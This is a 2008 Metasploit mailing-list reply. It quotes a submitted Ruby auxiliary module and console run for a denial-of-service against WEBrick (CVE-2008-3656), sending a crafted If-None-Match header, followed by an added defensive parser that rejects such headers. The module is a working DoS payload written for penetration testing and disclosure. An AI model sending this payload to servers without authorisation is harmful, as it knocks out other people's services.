Added. Thanks!

Best regards,


On Thu, 2008-10-16 at 20:23 -0500, Kris Katterjohn wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Hey guys,
> 
> I've attached a new DoS module for the WEBrick vulnerability[1]
> (WEBrick::HTTP::DefaultFileHandler) which causes massive CPU consumption.
> 
> I ran this simple server (like the one here[2]):
> 
> 
> require 'webrick'
> WEBrick::HTTPServer.new(:Port => 3333, :DocumentRoot => ".").start
> 
> 
> in my metasploit SVN checkout, and then ran this:
> 
> 
> msf > use dos/webrick_regex
> msf auxiliary(webrick_regex) > set RHOST 127.0.0.1
> RHOST => 127.0.0.1
> msf auxiliary(webrick_regex) > set RPORT 3333
> RPORT => 3333
> msf auxiliary(webrick_regex) > set URI /README
> URI => /README
> msf auxiliary(webrick_regex) > run
> [*] Request sent to 127.0.0.1:3333
> [*] Auxiliary module execution completed
> 
> 
> And watched my CPU usage go through the roof until I killed the server.
> 
> 
> msf auxiliary(webrick_regex) > info
> 
>        Name: Ruby WEBrick::HTTP::DefaultFileHandler DoS
>     Version: 1
> 
> Provided by:
>   Kris Katterjohn <[EMAIL PROTECTED]>
> 
> Basic options:
>   Name     Current Setting  Required  Description
>   ----     ---------------  --------  -----------
>   Proxies                   no        Use a proxy chain
>   RHOST    127.0.0.1        yes       The target address
>   RPORT    3333             yes       The target port
>   SSL      false            no        Use SSL
>   URI      /README          yes       URI to request
>   VHOST                     no        HTTP server virtual host
> 
> Description:
>   The WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and
>   earlier, 1.8.6 to 1.8.6-p286, 1.8.7 to 1.8.7-p71, and 1.9 to r18423
>   allows for a DoS (CPU consumption) via a crafted HTTP request.
> 
> 
> Thanks,
> Kris Katterjohn
> 
> [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3656
> [2] 
> http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
> 
> iQIVAwUBSPfo/v9K37xXYl36AQJz5hAAgjUurVAXTXbOT5sw+9STo2CGSWU1Zto7
> lTTc79QOyfmZZIJPN9e8lGGGTG7KBroxv0cwGwwurCQLeFyWSaIb/7dmc1Y353/5
> hsDGPrxito8KaM7qY/UT3MRJbQdBK+XjbhGgUfldfhB+dP2iPz02bKl/Rbp/fXXV
> wl4PSbF1fNlzLGkDE2ZilrO4amqxJ7c3X1hTcOC4AmkabYcxcgpnfxCz94irPSl+
> Jr8lw9vN+6x3sj2pYEhzM2SpUIV9yERX/onX/+fYE3OHiSg2KycMPX8pbiZ1rFgN
> Cw9D98BSBxGhpfS09UGCO4avooqs3D6Ea8tCV9WDCQZCOQoN+cryzQwCItqnBtUY
> 0uXHnccrXGBMlbAeKv4bp5K6GQJXLRKdrBc6NOQJ5e1jUrFSGdAOZo2Z25oQ5Q4R
> yOPq1wYtTYxJyl3mU4XeEkpsfO8dTKYQQXRa7WtLGibFq2xUZg+OSLVqaX/bLmf8
> SRhQwxGKLaC6jBDZilSfd3J2/JsqMj5zCpDiqOGsP2jhA4+iArpj4PIN+RG4GblJ
> mBwztAolNjcl0GXUNfXjzW5ZoHXYJNf22YNZBeqieYPKEoZLiQD3KFsbGmJ9l0Us
> 95acG9fw3mxhiYq7P5OnXX21ytHwA+3HEfO4yQrsXQDzrJpjYsQ40WtSNIFQud/4
> kJqH/wbxWcQ=
> =dJWD
> -----END PGP SIGNATURE-----
> plain text document attachment (webrick_regex.rb)
> require 'msf/core'
> 
> class Metasploit3 < Msf::Auxiliary
> 
>       include Msf::Exploit::Remote::HttpClient
> 
>       def initialize(info = {})
>               super(update_info(info,
>                       'Name'           => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',
>                       'Description'    => %q{
>                               The WEBrick::HTTP::DefaultFileHandler in WEBrick in
>                               Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7
>                               to 1.8.7-p71, and 1.9 to r18423 allows for a DoS
>                               (CPU consumption) via a crafted HTTP request.
>                       },
>                       'Author'         => 'Kris Katterjohn <[EMAIL PROTECTED]>',
>                       'License'        => MSF_LICENSE,
>                       'Version'        => '1',
>                       'References'     => [
>                               [ 'BID', '30644'],
>                               [ 'CVE', '2008-3656'],
>                               [ 'URL', 'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']
>                       ],
>                       'DisclosureDate' => 'Aug 08 2008'))
> 
>               register_options([
>                       OptString.new('URI', [ true, 'URI to request', '/' ])
>               ])
>       end
> 
>       def run
>               begin
>                       o = {
>                               'uri' => datastore['URI'] || '/',
>                               'headers' => {
>                                       # Crafted If-None-Match value: one empty parameter followed by
>                                       # 100 repeated quoted parameters (the trigger described above)
>                                       'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
>                               }
>                       }
> 
>                       c = connect(o)
>                       c.send_request(c.request_raw(o))
> 
>                       print_status("Request sent to #{rhost}:#{rport}")
>               rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
>                       print_status("Couldn't connect to #{rhost}:#{rport}")
>               rescue ::Timeout::Error, ::Errno::EPIPE
>                       # The server may stop answering once it is busy; nothing to report
>               end
>       end
> end
> 
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers@spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers
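The module quoted above sends an If-None-Match value that is not an entity-tag list at all, and the server burns CPU trying to split it. As an added example (not part of Kris's module, of Metasploit, or of WEBrick), here is a defensive, single-pass parser for that header that a request filter could run before the file handler sees the request: it caps the header size and tag count, and rejects anything that is not a comma-separated list of quoted entity tags, so a value like the one the module sends is refused at its first byte rather than reaching the regex-based header splitting the module's name refers to. The names MAX_HEADER_BYTES, MAX_ETAGS, parse_if_none_match and if_none_match_verdict are my own, the limits are assumed values, and DOS_STYLE_HEADER is a constructed sample modelled on the header the module builds.

```ruby
# Added example: linear-time If-None-Match parsing with hard limits.
# Not WEBrick code and not the module's code; all names and limits are assumptions.

MAX_HEADER_BYTES = 1024   # assumed cap; real ETag lists are far smaller
MAX_ETAGS        = 32     # assumed cap on the number of entity tags accepted

# Returns :star for "If-None-Match: *", otherwise an array of entity tags as
# they appear on the wire (weak tags keep their "W/" prefix, quoted-pairs are
# left unescaped). Raises ArgumentError for oversized or malformed values.
# The scan advances one character at a time and never backtracks, so the cost
# is proportional to the header length regardless of its content.
def parse_if_none_match(value)
  if value.bytesize > MAX_HEADER_BYTES
    raise ArgumentError, "If-None-Match too long (#{value.bytesize} bytes)"
  end
  value = value.strip
  return :star if value == "*"
  raise ArgumentError, "empty If-None-Match" if value.empty?

  tags = []
  i = 0
  n = value.length
  loop do
    # optional weak-validator prefix
    weak = false
    if value[i, 2] == "W/"
      weak = true
      i += 2
    end
    # every tag must be a quoted-string; anything else is rejected immediately
    raise ArgumentError, "expected '\"' at offset #{i}" unless value[i] == '"'
    i += 1
    start = i
    while i < n && value[i] != '"'
      i += (value[i] == "\\" ? 2 : 1)   # quoted-pair: skip the escaped character
    end
    raise ArgumentError, "unterminated entity tag at offset #{start}" if i >= n
    tag = value[start...i]
    i += 1
    tags << (weak ? "W/#{tag}" : tag)
    raise ArgumentError, "too many entity tags (> #{MAX_ETAGS})" if tags.length > MAX_ETAGS
    # separator: optional spaces, exactly one comma, optional spaces
    i += 1 while i < n && value[i] == " "
    break if i >= n
    raise ArgumentError, "expected ',' at offset #{i}" unless value[i] == ","
    i += 1
    i += 1 while i < n && value[i] == " "
    raise ArgumentError, "trailing comma in If-None-Match" if i >= n
  end
  tags
end

# Convenience wrapper for a request filter or log line: [:accept, tags] or
# [:reject, reason]. A reject is the signal to answer 400 without consulting
# the file handler at all.
def if_none_match_verdict(value)
  [:accept, parse_if_none_match(value)]
rescue ArgumentError => e
  [:reject, e.message]
end

# Constructed sample: the same shape as the header the module above sends.
DOS_STYLE_HEADER = %q{foo=""} + %q{bar="baz" } * 100

if __FILE__ == $PROGRAM_NAME
  [DOS_STYLE_HEADER, '"abc", W/"xyz"', "*"].each do |h|
    verdict, detail = if_none_match_verdict(h)
    puts "#{verdict}: #{detail.inspect} (#{h.bytesize} bytes)"
  end
end
```

The byte-size check runs before anything else so that a huge value is dropped without even being scanned; the tag-count check fires during the scan so the work done on a long but well-formed list is still bounded by MAX_ETAGS quoted strings.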
